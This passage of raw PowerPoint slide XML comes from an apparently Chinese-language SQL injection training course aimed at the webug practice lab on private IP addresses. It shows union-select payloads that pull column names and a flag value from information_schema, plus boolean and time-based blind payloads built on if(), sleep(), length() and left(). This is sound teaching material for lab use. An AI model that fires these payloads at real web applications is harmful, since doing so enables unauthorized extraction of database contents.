              <a:t>2. http://192.168.1.178/control/sqlinject/manifest_error.php?id=1‘ union select 1,group_concat(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>column_name</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>) from </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>information_schema.columns</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t> where </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>table_name</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>=’flag‘ --+ </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>查看</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>flag</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>表中的列  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>==》</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>id,flag</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>3. http://192.168.1.178/control/sqlinject/manifest_error.php?id=1‘ union select 1,flag from </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>webug.flag</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t> --+ </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>查询</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>flag</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>的字段值</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>==》</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>dfafdasfafdsadfa</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3102311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01D0DE-53E2-4951-9C90-9D97DF2D6E39}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1111170" y="416690"/>
            <a:ext cx="10131425" cy="276038"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="90000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>补充知识</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>_01</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="内容占位符 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9FF75F97-86A6-4AFA-A9D6-60F53AEEB89B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="471055" y="803564"/>
            <a:ext cx="11166763" cy="5637745"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>If()</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>函数</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>If(A&gt;B,C,D);</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>解释： 如果 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>A&gt;B </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>成立，则返回 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>C</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>，否则返回 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>D</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>；</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>例： </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>select if(1&gt;2,3,4);</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>Length();  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>显示长度</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>例：</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>select length(database())&gt;1;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>结合使用：</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>select if((length(database())&gt;1),1,sleep(5)); </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>如果当前的数据库长度大于</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>1</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>，则返回</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>1</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>，否则睡眠</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>5s</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>；</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>select if((select length(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>schema_name</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>) from </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>information_schema.schemata</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t> limit 0,1)&gt;1,1,sleep(5));</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="4086403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01D0DE-53E2-4951-9C90-9D97DF2D6E39}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1111170" y="416690"/>
            <a:ext cx="10131425" cy="276038"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="90000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>补充知识</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>_02</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="内容占位符 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9FF75F97-86A6-4AFA-A9D6-60F53AEEB89B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="471055" y="803564"/>
            <a:ext cx="11166763" cy="5637745"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>Left()</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>函数</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>Left(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>A,num</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>)=B   A</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>的前</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>num</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>位是不是</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>B</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>？</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>例子：</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>Select left(database(),1) &gt; ’a’ ; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>判断当前数据库的第一位是否比</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>a</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>大</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>同理：</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t> Select left(database(),2) &gt; ’</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>sa</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>’ ;  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>此时应该已经判断出了第一位，可以用这种方法判断第二位</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="219648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36BD6-822B-46F0-B4C6-EFDDECEDF17B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1111170" y="416690"/>
            <a:ext cx="10131425" cy="565444"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="90000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>Less-02_</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>布尔注入</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>_01</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="内容占位符 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1962A364-FF6B-4E50-86B3-1BC1C839C805}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="180109" y="1330036"/>
            <a:ext cx="11817927" cy="5292437"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>1. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>http://192.168.1.178/control/sqlinject/bool_injection.php?id=1</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>显示正常</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>2. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>http://192.168.80.136/control/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1">
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>sqlinject</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1">
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>bool_injection.php?id</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>=1</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>‘</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>显示不完整，但是没有报错信息产生</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>3. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:hlinkClick r:id="rId4"/>
              </a:rPr>
              <a:t>http://192.168.80.136/control/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1">
                <a:hlinkClick r:id="rId4"/>
              </a:rPr>
              <a:t>sqlinject</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:hlinkClick r:id="rId4"/>
              </a:rPr>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1">
                <a:hlinkClick r:id="rId4"/>
              </a:rPr>
              <a:t>bool_injection.php?id</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:hlinkClick r:id="rId4"/>
              </a:rPr>
              <a:t>=1’--</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>+ </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>显示正常，根据提示，得到注入点</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>4. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>http://192.168.80.136/control/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1">
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>sqlinject</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1">
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>bool_injection.php?id</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>=1</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>‘ order by 2--+ </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>此时显示正常，说明存在两列（其实这个在本节中没有意义）</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>5. http://192.168.80.136/control/sqlinject/bool_injection.php?id=1‘ and  if((length(database())&gt;2),1,sleep(5))--+ </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>通过慢慢测试到当前的数据库名字长度为</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>5.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3960835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36BD6-822B-46F0-B4C6-EFDDECEDF17B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1111170" y="416690"/>
            <a:ext cx="10131425" cy="565444"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="90000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>Less-02_</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>布尔注入</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>_02</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="内容占位符 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1962A364-FF6B-4E50-86B3-1BC1C839C805}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="180109" y="1330036"/>
            <a:ext cx="11817927" cy="5292437"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>1.  http://192.168.80.136/control/sqlinject/bool_injection.php?id=1‘ and  if((select length(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>schema_name</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>) from </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>information_schema.schemata</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t> limit 0,1)&gt;100,1,sleep(5))--+ </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>通过这个来查询数据库的长度，当然这个是每一个进行查询，在本节中我们查询的是当前的数据库，可以使用</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:sym typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t>2.  http://192.168.80.136/control/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1">
                <a:sym typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t>sqlinject</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:sym typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1">
                <a:sym typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t>bool_injection.php?id</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:sym typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t>=1‘ and  if((select length(database()))&gt;2,1,sleep(5))--+</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:sym typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t>这个是用来查询当前使用的数据库长度是多少的，最后知道这个数据库长度是</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:sym typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t>5</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:sym typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t>3. http://192.168.80.136/control/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1">
                <a:sym typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t>sqlinject</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:sym typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1">
                <a:sym typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t>bool_injection.php?id</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:sym typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t>=1‘ and  left(database(),1) &gt; ’s’--+ </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:sym typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t>使用大于号可以用来判断，但是在正式使用的时候，我们可以使用</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1">
                <a:sym typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t>burpsuite</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:sym typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t>进行辅助判断，加快速度，最快的当然是使用脚本，本次视频暂不示范。</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0">
              <a:sym typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:sym typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t>注意： </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
